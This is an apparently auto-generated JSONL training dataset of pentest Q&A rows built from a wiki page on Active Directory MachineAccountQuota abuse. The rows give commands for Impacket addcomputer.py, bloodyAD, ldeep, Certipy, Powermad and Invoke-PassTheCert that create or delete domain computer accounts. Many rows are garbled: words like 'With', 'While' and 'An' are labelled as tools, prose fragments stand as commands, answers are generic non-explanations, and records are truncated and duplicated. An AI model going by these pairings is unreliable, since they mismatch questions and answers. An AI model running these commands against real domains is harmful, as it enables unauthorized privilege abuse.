authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do Delete the object 'CN=COMPUTATOR,CN=Computers,DC=X'", "response": "Invoke-PassTheCert -Action 'DeleteObject' -LdapConnection $LdapConnection -Object 'CN=COMPUTATOR,CN=Computers,DC=X'\n```\n\n:::", "metadata": {"corpus_index": 207, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "How does MachineAccountQuota - Create a computer account work?"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script addcomputer (Python) can be used to create a computer account, using the credentials of a domain user the the MachineAccountQuota domain-level attribute is set higher than 0 (10 by default).\n\n``bash\naddcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\naddcomputer.py also has an option -computer-group for adding a group to which the account will be added. Because if omitted, the group CN=Computers will be used by default.\n\nTesters can also use ntlmrelayx (Python) instead with the --add-computer option, like this\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs. In this case, they could be added later on with addspn.py (Python). By default, computer accounts have the following SPNs set:\n> \n> `\n> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> `\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --host \"$DC_HOST\" add computer 'SomeName$' 'SomePassword'\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_HOST\" create_computer 'SomeName$' 'SomePassword'\n`\n\nWith Certipy (Python):\n\n`bash\ncertipy account create -username \"$USER\"@\"$DOMAIN\" -password \"$PASSWORD\" -dc-ip \"$DC_HOST\" -user 'SomeName$' -pass 'SomePassword' -dns 'SomeDNS'\n`\n\nCertipy also offers option to set the UPN (-upn), SAM account name (-sam), SPNS (-spns) while creating the computer.\n\n=== Windows\n\nThe Powermad module (PowerShell) can be used to create a domain computer account.\n\n`powershell\n$password = ConvertTo-SecureString 'SomePassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount 'PENTEST01' -Password $($password) -"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "How does MachineAccountQuota - Create a computer account work?", "response": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script addcomputer (Python) can be used to create a computer account, using the credentials of a domain user the the MachineAccountQuota domain-level attribute is set higher than 0 (10 by default).\n\n``bash\naddcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\naddcomputer.py also has an option -computer-group for adding a group to which the account will be added. Because if omitted, the group CN=Computers will be used by default.\n\nTesters can also use ntlmrelayx (Python) instead with the --add-computer option, like this\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs. In this case, they could be added later on with addspn.py (Python). By default, computer accounts have the following SPNs set:\n> \n> `\n> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> `\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --host \"$DC_HOST\" add computer 'SomeName$' 'SomePassword'\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_HOST\" create_computer 'SomeName$' 'SomePassword'\n`\n\nWith Certipy (Python):\n\n`bash\ncertipy account create -username \"$USER\"@\"$DOMAIN\" -password \"$PASSWORD\" -dc-ip \"$DC_HOST\" -user 'SomeName$' -pass 'SomePassword' -dns 'SomeDNS'\n`\n\nCertipy also offers option to set the UPN (-upn), SAM account name (-sam), SPNS (-spns) while creating the computer.\n\n=== Windows\n\nThe Powermad module (PowerShell) can be used to create a domain computer account.\n\n`powershell\n$password = ConvertTo-SecureString 'SomePassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount 'PENTEST01' -Password $($password) -", "metadata": {"corpus_index": 208, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MachineAccountQuota - Create a computer account"}, {"role": "assistant", "content": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script addcomputer (Python) can be used to create a computer account, using the credentials of a domain user the the MachineAccountQuota domain-level attribute is set higher than 0 (10 by default).\n\n``bash\naddcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\naddcomputer.py also has an option -computer-group for adding a group to which the account will be added. Because if omitted, the group CN=Computers will be used by default.\n\nTesters can also use ntlmrelayx (Python) instead with the --add-computer option, like this\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs. In this case, they could be added later on with addspn.py (Python). By default, computer accounts have the following SPNs set:\n> \n> `\n> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> `\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --host \"$DC_HOST\" add computer 'SomeName$' 'SomePassword'\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_HOST\" create_computer 'SomeName$' 'SomePassword'\n`\n\nWith Certipy (Python):\n\n`bash\ncertipy account create -username \"$USER\"@\"$DOMAIN\" -password \"$PASSWORD\" -dc-ip \"$DC_HOST\" -user 'SomeName$' -pass 'SomePassword' -dns 'SomeDNS'\n`\n\nCertipy also offers option to set the UPN (-upn), SAM account name (-sam), SPNS (-spns) while creating the computer.\n\n=== Windows\n\nThe Powermad module (PowerShell) can be used to create a domain computer account.\n\n`powershell\n$password = ConvertTo-SecureString 'SomePassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount 'PENTEST01' -Password $($password) -"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MachineAccountQuota - Create a computer account", "response": "::: tabs\n\n=== UNIX-like\n\nThe Impacket script addcomputer (Python) can be used to create a computer account, using the credentials of a domain user the the MachineAccountQuota domain-level attribute is set higher than 0 (10 by default).\n\n``bash\naddcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"\n`\n\naddcomputer.py also has an option -computer-group for adding a group to which the account will be added. Because if omitted, the group CN=Computers will be used by default.\n\nTesters can also use ntlmrelayx (Python) instead with the --add-computer option, like this\n\n> [!TIP]\n> When using Impacket's addcomputer script for the creation of a computer account, the \"SAMR\" method is used by default (instead of the LDAPS one). At the time of writing (10th of December, 2021), the SAMR method creates the account without SPNs. In this case, they could be added later on with addspn.py (Python). By default, computer accounts have the following SPNs set:\n> \n> `\n> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> `\n\nWith bloodyAD (Python):\n\n`bash\nbloodyad -d \"$DOMAIN\" -u \"$USER\" -p \"$PASSWORD\" --host \"$DC_HOST\" add computer 'SomeName$' 'SomePassword'\n`\n\nWith ldeep (Python):\n\n`bash\nldeep ldap -u \"$USER\" -p \"$PASSWORD\" -d \"$DOMAIN\" -s ldap://\"$DC_HOST\" create_computer 'SomeName$' 'SomePassword'\n`\n\nWith Certipy (Python):\n\n`bash\ncertipy account create -username \"$USER\"@\"$DOMAIN\" -password \"$PASSWORD\" -dc-ip \"$DC_HOST\" -user 'SomeName$' -pass 'SomePassword' -dns 'SomeDNS'\n`\n\nCertipy also offers option to set the UPN (-upn), SAM account name (-sam), SPNS (-spns) while creating the computer.\n\n=== Windows\n\nThe Powermad module (PowerShell) can be used to create a domain computer account.\n\n`powershell\n$password = ConvertTo-SecureString 'SomePassword' -AsPlainText -Force\nNew-MachineAccount -MachineAccount 'PENTEST01' -Password $($password) -", "metadata": {"corpus_index": 208, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the addcomputer.py syntax for machineaccountquota - create a computer account?"}, {"role": "assistant", "content": "addcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the addcomputer.py syntax for machineaccountquota - create a computer account?", "response": "addcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 209, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "addcomputer.py"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How do I perform MachineAccountQuota - Create a computer account?"}, {"role": "assistant", "content": "addcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\""}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How do I perform MachineAccountQuota - Create a computer account?", "response": "addcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"", "metadata": {"corpus_index": 209, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `addcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - create a computer account. Create a computer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `addcomputer.py -computer-name 'SomeName$' -computer-pass 'SomePassword' -dc-host \"$DC_HOST\" -domain-netbios \"$DOMAIN\" \"$DOMAIN\"/\"$USER\":\"$PASSWORD\"`?", "response": "This command is used for machineaccountquota - create a computer account. Create a computer account", "metadata": {"corpus_index": 209, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use hostname for machineaccountquota - create a computer account?"}, {"role": "assistant", "content": "> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> ```\n\nWith [bloodyAD](https://github.com/CravateRouge/bloodyAD) (Python):"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use hostname for machineaccountquota - create a computer account?", "response": "> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> ```\n\nWith [bloodyAD](https://github.com/CravateRouge/bloodyAD) (Python):", "metadata": {"corpus_index": 210, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "hostname"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do MachineAccountQuota - Create a computer account"}, {"role": "assistant", "content": "> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> ```\n\nWith [bloodyAD](https://github.com/CravateRouge/bloodyAD) (Python):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do MachineAccountQuota - Create a computer account", "response": "> KrbRestrictedHost/hostname\n> KrbRestrictedHost/hostname.domain_fqdn\n> Host/hostname\n> Host/hostname.domain_fqdn\n> ```\n\nWith [bloodyAD](https://github.com/CravateRouge/bloodyAD) (Python):", "metadata": {"corpus_index": 210, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> KrbRestrictedHost/hostname`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - create a computer account. Create a computer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> KrbRestrictedHost/hostname`?", "response": "This command is used for machineaccountquota - create a computer account. Create a computer account", "metadata": {"corpus_index": 210, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Show me the With command for machineaccountquota - create a computer account"}, {"role": "assistant", "content": "With [ldeep](https://github.com/franc-pentest/ldeep) (Python):"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Show me the With command for machineaccountquota - create a computer account", "response": "With [ldeep](https://github.com/franc-pentest/ldeep) (Python):", "metadata": {"corpus_index": 211, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "With"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Show me how to do MachineAccountQuota - Create a computer account"}, {"role": "assistant", "content": "With [ldeep](https://github.com/franc-pentest/ldeep) (Python):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Show me how to do MachineAccountQuota - Create a computer account", "response": "With [ldeep](https://github.com/franc-pentest/ldeep) (Python):", "metadata": {"corpus_index": 211, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `With [ldeep](https://github.com/franc-pentest/ldeep) (Python):`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - create a computer account. Create a computer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `With [ldeep](https://github.com/franc-pentest/ldeep) (Python):`?", "response": "This command is used for machineaccountquota - create a computer account. Create a computer account", "metadata": {"corpus_index": 211, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use With for machineaccountquota - create a computer account?"}, {"role": "assistant", "content": "With [Certipy](https://github.com/ly4k/Certipy) (Python):"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use With for machineaccountquota - create a computer account?", "response": "With [Certipy](https://github.com/ly4k/Certipy) (Python):", "metadata": {"corpus_index": 212, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "With"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through MachineAccountQuota - Create a computer account"}, {"role": "assistant", "content": "With [Certipy](https://github.com/ly4k/Certipy) (Python):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through MachineAccountQuota - Create a computer account", "response": "With [Certipy](https://github.com/ly4k/Certipy) (Python):", "metadata": {"corpus_index": 212, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `With [Certipy](https://github.com/ly4k/Certipy) (Python):`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - create a computer account. Create a computer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `With [Certipy](https://github.com/ly4k/Certipy) (Python):`?", "response": "This command is used for machineaccountquota - create a computer account. Create a computer account", "metadata": {"corpus_index": 212, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Certipy command to machineaccountquota - create a computer account"}, {"role": "assistant", "content": "Certipy also offers option to set the UPN (`-upn`), SAM account name (`-sam`), SPNS (`-spns`) while creating the computer.\n\n\n=== Windows\n\nThe [Powermad](https://github.com/Kevin-Robertson/Powermad) module (PowerShell) can be used to create a domain computer account."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Certipy command to machineaccountquota - create a computer account", "response": "Certipy also offers option to set the UPN (`-upn`), SAM account name (`-sam`), SPNS (`-spns`) while creating the computer.\n\n\n=== Windows\n\nThe [Powermad](https://github.com/Kevin-Robertson/Powermad) module (PowerShell) can be used to create a domain computer account.", "metadata": {"corpus_index": 213, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Certipy"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for MachineAccountQuota - Create a computer account"}, {"role": "assistant", "content": "Certipy also offers option to set the UPN (`-upn`), SAM account name (`-sam`), SPNS (`-spns`) while creating the computer.\n\n\n=== Windows\n\nThe [Powermad](https://github.com/Kevin-Robertson/Powermad) module (PowerShell) can be used to create a domain computer account."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for MachineAccountQuota - Create a computer account", "response": "Certipy also offers option to set the UPN (`-upn`), SAM account name (`-sam`), SPNS (`-spns`) while creating the computer.\n\n\n=== Windows\n\nThe [Powermad](https://github.com/Kevin-Robertson/Powermad) module (PowerShell) can be used to create a domain computer account.", "metadata": {"corpus_index": 213, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Certipy also offers option to set the UPN (`-upn`), SAM account name (`-sam`), SPNS (`-spns`) while creating the computer.`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - create a computer account. Create a computer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Certipy also offers option to set the UPN (`-upn`), SAM account name (`-sam`), SPNS (`-spns`) while creating the computer.`?", "response": "This command is used for machineaccountquota - create a computer account. Create a computer account", "metadata": {"corpus_index": 213, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the While syntax for machineaccountquota - create a computer account?"}, {"role": "assistant", "content": "While the machine account can only be deleted by domian administrators, it can be deactivated by the creator account with the following command using the Powermad module."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the While syntax for machineaccountquota - create a computer account?", "response": "While the machine account can only be deleted by domian administrators, it can be deactivated by the creator account with the following command using the Powermad module.", "metadata": {"corpus_index": 214, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "While"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MachineAccountQuota - Create a computer account"}, {"role": "assistant", "content": "While the machine account can only be deleted by domian administrators, it can be deactivated by the creator account with the following command using the Powermad module."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MachineAccountQuota - Create a computer account", "response": "While the machine account can only be deleted by domian administrators, it can be deactivated by the creator account with the following command using the Powermad module.", "metadata": {"corpus_index": 214, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `While the machine account can only be deleted by domian administrators, it can be deactivated by the creator account with the following command using the Powermad module.`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - create a computer account. Create a computer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `While the machine account can only be deleted by domian administrators, it can be deactivated by the creator account with the following command using the Powermad module.`?", "response": "This command is used for machineaccountquota - create a computer account. Create a computer account", "metadata": {"corpus_index": 214, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "How do I use An for machineaccountquota - create a computer account?"}, {"role": "assistant", "content": "An alternative is to use FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) (C#, .NET assembly) project to create a new password account with a random password, disable the account, or delete it (with elevated privileges):"}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "How do I use An for machineaccountquota - create a computer account?", "response": "An alternative is to use FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) (C#, .NET assembly) project to create a new password account with a random password, disable the account, or delete it (with elevated privileges):", "metadata": {"corpus_index": 215, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "An"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on MachineAccountQuota - Create a computer account"}, {"role": "assistant", "content": "An alternative is to use FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) (C#, .NET assembly) project to create a new password account with a random password, disable the account, or delete it (with elevated privileges):"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on MachineAccountQuota - Create a computer account", "response": "An alternative is to use FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) (C#, .NET assembly) project to create a new password account with a random password, disable the account, or delete it (with elevated privileges):", "metadata": {"corpus_index": 215, "category": "active_directory", "source_file": "docs/src/ad/movement/builtins/machineaccountquota.md", "page_title": "MachineAccountQuota", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `An alternative is to use FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) (C#, .NET assembly) project to create a new password account with a random password, disable the account, or delete it (with elevated privileges):`?"}, {"role": "assistant", "content": "This command is used for machineaccountquota - create a computer account. Create a computer account"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `An alternative is to use FuzzSecurity's [StandIn](https://github.com/FuzzySecurity/StandIn) (C#, .NET assembly) project to create a new password account with a random password, disable the account, or delete it (with elevated privileges):`?", "response": "This command is used for machineaccountquota - create a computer account. 